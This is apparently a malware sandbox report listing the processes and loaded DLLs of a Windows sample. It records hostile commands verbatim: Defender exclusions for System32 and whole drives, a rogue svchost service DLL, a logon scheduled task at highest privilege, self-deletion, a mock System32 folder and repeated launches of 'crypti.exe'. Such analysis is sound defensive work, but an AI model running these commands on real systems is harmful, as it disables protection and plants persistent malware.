Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows \System32\printui.exe"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f && sc start x543664
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x543664
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\pyld64.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\pyld64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\usvcinsta64.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\usvcinsta64.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\usvcinsta64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\usvcinsta64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows \System32\printui.exeSection loaded: uxtheme.dll
Source: C:\Windows \System32\printui.exeSection loaded: printui.dll
Source: C:\Windows \System32\printui.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
